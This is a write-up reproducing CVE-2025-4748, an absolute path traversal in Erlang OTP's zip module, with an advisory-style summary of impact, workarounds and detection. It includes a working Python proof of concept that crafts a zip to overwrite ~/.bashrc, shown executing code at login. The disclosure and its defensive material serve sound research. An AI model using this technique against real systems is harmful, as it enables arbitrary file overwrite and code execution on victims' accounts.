Full Report
There’s a new Erlang OTP vulnerability, CVE-2025-4748. It’s an Absolute Path Traversal vulnerability involving a Zip archive, which I have a lot of practice with. It affects Erlang OTP, which a coworker has already written about recently and noted the necessary steps to set up an environment. This is a “local” vulnerability (unless you’re unpacking a Zip archive as part of a network call), but is still fun to play with. Here’s how to reproduce: Setup Similarly to the prior work of my coworker, set up an Ubuntu Jammy virtual machine and install erlang. wget https://binaries2.erlang-solutions.com/ubuntu/pool/contrib/e/esl-erlang/esl-erlang_25.3.2-1~ubuntu~jammy_amd64.deb sudo dpkg -i esl-erlang_25.3.2-1\~ubuntu\~jammy_amd64.deb sudo apt --fix-broken install Valid Test Case Create a valid zip file to check the expected behavior. touch emptyfile zip valid.zip emptyfile In the Erlang shell unzip the valid.zip to a destination directory of /tmp/ ~$ erl Erlang/OTP 25 [erts-13.2.2] [source] [64-bit] [smp:4:4] [ds:4:4:10] [async-threads:1] [jit:ns] Eshell V13.2.2 (abort with ^G) 1> {ok, FileList} = zip:unzip("valid.zip", [{cwd, "/tmp/"}]). {ok,["/tmp/emptyfile"]} And we see that as expected, emptyfile was written to the destination directory as /tmp/emptyfile PoC From the CVE notes: When the zip module is used to extract files to disk and the archive is maliciously corrupted by including absolute file paths, the zip module would extract them as absolute paths instead of stripping the leading /, drive or device letter. So this should be pretty easy, we’ll use python script to create a Zip archive with an absolute path of /home/remy/.bashrc and insert some code to demonstrate how we can leverage this vulnerability to overwrite a file leading to remote code execution, by printing Code exec via CVE-2025-4748. import io import zipfile buf = io.BytesIO() zf = zipfile.ZipFile(buf, "w") zf.writestr("/home/remy/.bashrc", "echo 'Code exec via CVE-2025-4748'\n") zf.close() with open("poc.zip", "wb") as f: f.write(buf.getvalue()) Again, we’ll use the erlang shell to decompress our poc.zip to a destination directory of /tmp/, but the vulnerability should instead clobber /home/remy/.bashrc. ~$ erl Erlang/OTP 25 [erts-13.2.2] [source] [64-bit] [smp:4:4] [ds:4:4:10] [async-threads:1] [jit:ns] Eshell V13.2.2 (abort with ^G) 1> {ok, FileList} = zip:unzip("poc.zip", [{cwd, "/tmp/"}]). {ok,["/home/remy/.bashrc"]} And yup, that worked. So next time the user remy logs in, the inserted code will execute with their ~/.bashrc is read. Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-141-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. New release '24.04.2 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Tue Jun 17 15:28:17 2025 from 192.168.8.245 Code exec via CVE-2025-4748 remy@erlang:~$
Analysis Summary
# Vulnerability: Absolute Path Traversal in Erlang OTP Zip Module
## CVE Details
- CVE ID: CVE-2025-4748
- CVSS Score: N/A (Score not provided in the source, but exploitation suggests High severity) ([Severity: Unknown])
- CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))
## Affected Systems
- Products: Erlang OTP (Stdlib modules: `zip:unzip/2` function)
- Versions: Erlang/OTP 25 (specifically tested with version 25.3.2)
- Configurations: Systems where the `zip:unzip/2` function is used to extract Zip archives that may contain maliciously crafted entries referencing absolute paths.
## Vulnerability Description
The vulnerability exists in the Erlang OTP zip module when extracting files. Specifically, the `zip:unzip/2` function fails to properly sanitize filenames contained within a Zip archive. If a file entry within the archive specifies an absolute path (e.g., starting with `/`), the module extracts the file to that absolute location on the disk instead of stripping the leading `/` or resolving the path relative to the specified `cwd` option. This allows an attacker to overwrite arbitrary files accessible by the user running the Erlang process.
## Exploitation
- Status: PoC available
- Complexity: Low (Requires creating a custom malicious Zip file and local file system access, or network access if the archive is downloaded/received)
- Attack Vector: Local (Can be exploited locally by triggering an extraction; becomes Network if the zip file is sourced from a network operation, leading potentially to Remote Code Execution (RCE) via shell profile corruption).
## Impact
- Confidentiality: Potential (Arbitrary file read, if a sensible file is overwritten)
- Integrity: High (Confirmed ability to overwrite system files like `~/.bashrc`, leading to code execution upon next user login)
- Availability: Medium (Potential for denial of service via overwriting critical files)
## Remediation
### Patches
- No specific patch version was listed in the source material, but the vulnerability notes suggest an update to the zip module addressing path stripping is required. Users should check official Erlang/OTP advisories for the fixed version.
### Workarounds
- Avoid unpacking untrusted or unverified Zip archives using the Erlang `zip:unzip/2` function.
- Ensure that the Erlang process is running under the least privileged user possible to minimize the impact of arbitrary file overwrites.
## Detection
- Indicators of compromise: Unexpected modification or creation of sensitive system files (e.g., `/etc/passwd`, user configuration files like `~/.bashrc`, startup scripts) originating from an Erlang application process.
- Detection methods and tools: File integrity monitoring (FIM) solutions examining file write/modification events from Erlang processes, particularly around archive extraction operations.
## References
- Vendor advisories: Refer to the official Erlang/OTP security notifications released around June 2025.
- Relevant links - defanged:
- hxxps://www.cve.org/CVERecord?id=CVE-2025-4748
- hxxps://labs.greynoise.io/grimoire/2025-04-22-erlang-ssh (Contextual background on recent Erlang work)